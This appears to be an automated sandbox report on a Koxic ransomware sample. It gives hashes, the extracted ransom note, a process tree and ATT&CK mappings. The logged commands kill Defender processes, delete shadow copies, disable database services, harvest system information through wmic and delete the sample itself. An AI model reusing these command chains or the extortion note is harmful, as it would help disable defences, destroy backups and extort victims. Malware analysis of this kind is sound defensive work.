Analysis

  • max time kernel
    117s
  • max time network
    117s
  • platform
    windows7_x64
  • resource
    win7-en-20211208
  • submitted
    21-01-2022 11:24

General

  • Target

    enc.exe

  • Size

    156KB

  • MD5

    14ee62fcc9163509856671400429ad55

  • SHA1

    7544332b52769ca853d900669ef5e272a2ae1665

  • SHA256

    699159e695e230a48d94b6103b48940ed596d0b48fb6d936c04d86eed539cecd

  • SHA512

    4d71c87be6f6ad7c9f3277b60850cd7136cecfd5f15621d1e56b1897008da8cc742578112ea955f8417c8d4cf13bcfb92e7ceafb34720017b47d81c4d2603bff

Malware Config

Extracted

Path

C:\Documents and Settings\WANNA_RECOVER_KOXIC_FILEZ_GWOFW.txt

Ransom Note
--=== Hello. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. All sensitive information also leaked. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should send sample to us to decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise-time is much more valuable than money. [+] How to contact us? [+] You have two ways: 1) [Recommended] Using an email Just write us an email to wilhelmkox@tutanota.com 2) Quick contact with us or if you will not receive our letters download qTox and ADD our TOXID: F3C777D22A0686055A3558917315676D607026B680DA5C8D3D4D887017A2A844F546AE59F59F How to download QTOX: - https://tox.chat/download.html - https://github.com/qTox/qTox/releases/download/v1.17.3/setup-qtox-x86_64-release.exe Add our mails to contacts so as not to lose letters from us. Check your spam sometimes, our emails may get there. [+] Consequences if we do not find a common language [+] 1. The data were irretrievably lost. 2. Leaked data will be published or sold on blmarket (or to competitors). 3. In some cases, DDOS attacks will be applied to your inftastructure. !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. 
From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!! Your User
Emails

wilhelmkox@tutanota.com

URLs

https://tox.chat/download.html

https://github.com/qTox/qTox/releases/download/v1.17.3/setup-qtox-x86_64-release.exe

Signatures

  • Koxic

    Ransomware written in C++, first seen in late 2021.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Disables taskbar notifications via registry modification
  • Modifies extensions of user files 18 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Deletes itself 1 IoCs
  • Windows security modification 2 TTPs 8 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Gathers network information 2 TTPs 1 IoCs

    Uses commandline utility to view network configuration.

  • Interacts with shadow copies 2 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Kills process with taskkill 1 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\enc.exe
    "C:\Users\Admin\AppData\Local\Temp\enc.exe"
    1⤵
    • Modifies extensions of user files
    • Windows security modification
    • Drops file in Program Files directory
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:740
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c taskkill /F /IM MSASCuiL.exe taskkill /F /IM MSMpeng.exe taskkill /F /IM msseces.exe
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1672
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /F /IM MSASCuiL.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:560
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c vssadmin delete shadows /all /quiet sc config browser sc config browser start=enabled sc stop vss sc config vss start=disabled sc stop MongoDB sc config MongoDB start=disabled sc stop SQLWriter sc config SQLWriter start=disabled sc stop MSSQLServerOLAPService sc config MSSQLServerOLAPService start=disabled sc stop MSSQLSERVER sc config MSSQLSERVER start=disabled sc stop MSSQL$SQLEXPRESS sc config MSSQL$SQLEXPRESS start=disabled sc stop ReportServer sc config ReportServer start=disabled sc stop OracleServiceORCL sc config OracleServiceORCL start=disabled sc stop OracleDBConsoleorcl sc config OracleDBConsoleorcl start=disabled sc stop OracleMTSRecoveryService sc config OracleMTSRecoveryService start=disabled sc stop OracleVssWriterORCL sc config OracleVssWriterORCL start=disabled sc stop MySQL sc config MySQL start=disabled
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1148
      • C:\Windows\SysWOW64\vssadmin.exe
        vssadmin delete shadows /all /quiet
        3⤵
        • Interacts with shadow copies
        PID:1860
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c "echo OS INFO: > %TEMP%\JDABUAUCS"
      2⤵
      PID:1848
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c "wmic OS get Caption,CSDVersion,OSArchitecture,Version >> %TEMP%\JDABUAUCS"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1648
      • C:\Windows\SysWOW64\Wbem\WMIC.exe
        wmic OS get Caption,CSDVersion,OSArchitecture,Version
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1212
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c "echo BIOS INFO: >> %TEMP%\JDABUAUCS"
      2⤵
      PID:1820
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c "wmic BIOS get Manufacturer, Name, SMBIOSBIOSVersion, Version >> %TEMP%\JDABUAUCS"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1956
      • C:\Windows\SysWOW64\Wbem\WMIC.exe
        wmic BIOS get Manufacturer, Name, SMBIOSBIOSVersion, Version
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:988
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c "echo CPU INFO: >> %TEMP%\JDABUAUCS"
      2⤵
      PID:1036
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c "wmic CPU get Name, NumberOfCores, NumberOfLogicalProcessors >> %TEMP%\JDABUAUCS"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1324
      • C:\Windows\SysWOW64\Wbem\WMIC.exe
        wmic CPU get Name, NumberOfCores, NumberOfLogicalProcessors
        3⤵
        PID:288
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c "echo MEMPHYSICAL INFO: >> %TEMP%\JDABUAUCS"
      2⤵
      PID:1952
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c "wmic MEMPHYSICAL get MaxCapacity >> %TEMP%\JDABUAUCS"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:316
      • C:\Windows\SysWOW64\Wbem\WMIC.exe
        wmic MEMPHYSICAL get MaxCapacity
        3⤵
        PID:1944
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c "echo MEMORYCHIP: INFO >> %TEMP%\JDABUAUCS"
      2⤵
      PID:1028
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c "wmic MEMORYCHIP get Capacity, DeviceLocator, PartNumber, Tag >> %TEMP%\JDABUAUCS"
      2⤵
      PID:1596
      • C:\Windows\SysWOW64\Wbem\WMIC.exe
        wmic MEMORYCHIP get Capacity, DeviceLocator, PartNumber, Tag
        3⤵
        PID:1392
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c "echo NIC INFO: >> %TEMP%\JDABUAUCS"
      2⤵
      PID:792
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c "wmic NIC get Description, MACAddress, NetEnabled, Speed >> %TEMP%\JDABUAUCS"
      2⤵
      PID:268
      • C:\Windows\SysWOW64\Wbem\WMIC.exe
        wmic NIC get Description, MACAddress, NetEnabled, Speed
        3⤵
        PID:1668
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c "echo DISKDRIVE INFO: >> %TEMP%\JDABUAUCS"
      2⤵
      PID:680
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c "wmic DISKDRIVE get InterfaceType, Name, Size, Status >> %TEMP%\JDABUAUCS"
      2⤵
      PID:1856
      • C:\Windows\SysWOW64\Wbem\WMIC.exe
        wmic DISKDRIVE get InterfaceType, Name, Size, Status
        3⤵
        PID:1864
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c "echo USERACCOUNT INFO: >> %TEMP%\JDABUAUCS"
      2⤵
      PID:1560
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c "wmic USERACCOUNT get Caption, Name, PasswordRequired, Status >> %TEMP%\JDABUAUCS"
      2⤵
      PID:1716
      • C:\Windows\SysWOW64\Wbem\WMIC.exe
        wmic USERACCOUNT get Caption, Name, PasswordRequired, Status
        3⤵
        PID:604
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c "echo IPCONFIG: >> %TEMP%\JDABUAUCS"
      2⤵
      PID:1868
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c "ipconfig >> %TEMP%\JDABUAUCS"
      2⤵
      PID:1336
      • C:\Windows\SysWOW64\ipconfig.exe
        ipconfig
        3⤵
        • Gathers network information
        PID:1960
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c "echo DATABASES FILES: >> %TEMP%\JDABUAUCS"
      2⤵
      PID:1740
    • C:\Windows\SysWOW64\notepad.exe
      notepad.exe C:\Users\Admin\AppData\Local\Temp\WANNA_RECOVER_KOXIC_FILEZ_GWOFW.txt
      2⤵
      • Opens file in notepad (likely ransom note)
      PID:1056
    • C:\Windows\SysWOW64\cmd.exe
      cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\enc.exe"
      2⤵
      • Deletes itself
      PID:792
      • C:\Windows\SysWOW64\PING.EXE
        ping 1.1.1.1 -n 1 -w 3000
        3⤵
        • Runs ping.exe
        PID:1592
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:844

Network

MITRE ATT&CK Matrix ATT&CK v6

Execution

  • Command-Line Interface
    1
    T1059

Persistence

  • Modify Existing Service
    1
    T1031

Defense Evasion

  • Modify Registry
    2
    T1112
  • Disabling Security Tools
    2
    T1089
  • File Deletion
    2
    T1107

Discovery

  • System Information Discovery
    1
    T1082
  • Remote System Discovery
    1
    T1018

Impact

  • Inhibit System Recovery
    2
    T1490

Downloads

  • C:\Users\Admin\AppData\Local\Temp\JDABUAUCS
  • C:\Users\Admin\AppData\Local\Temp\WANNA_RECOVER_KOXIC_FILEZ_GWOFW.txt
  • memory/740-54-0x0000000075321000-0x0000000075323000-memory.dmp
    Filesize
    8KB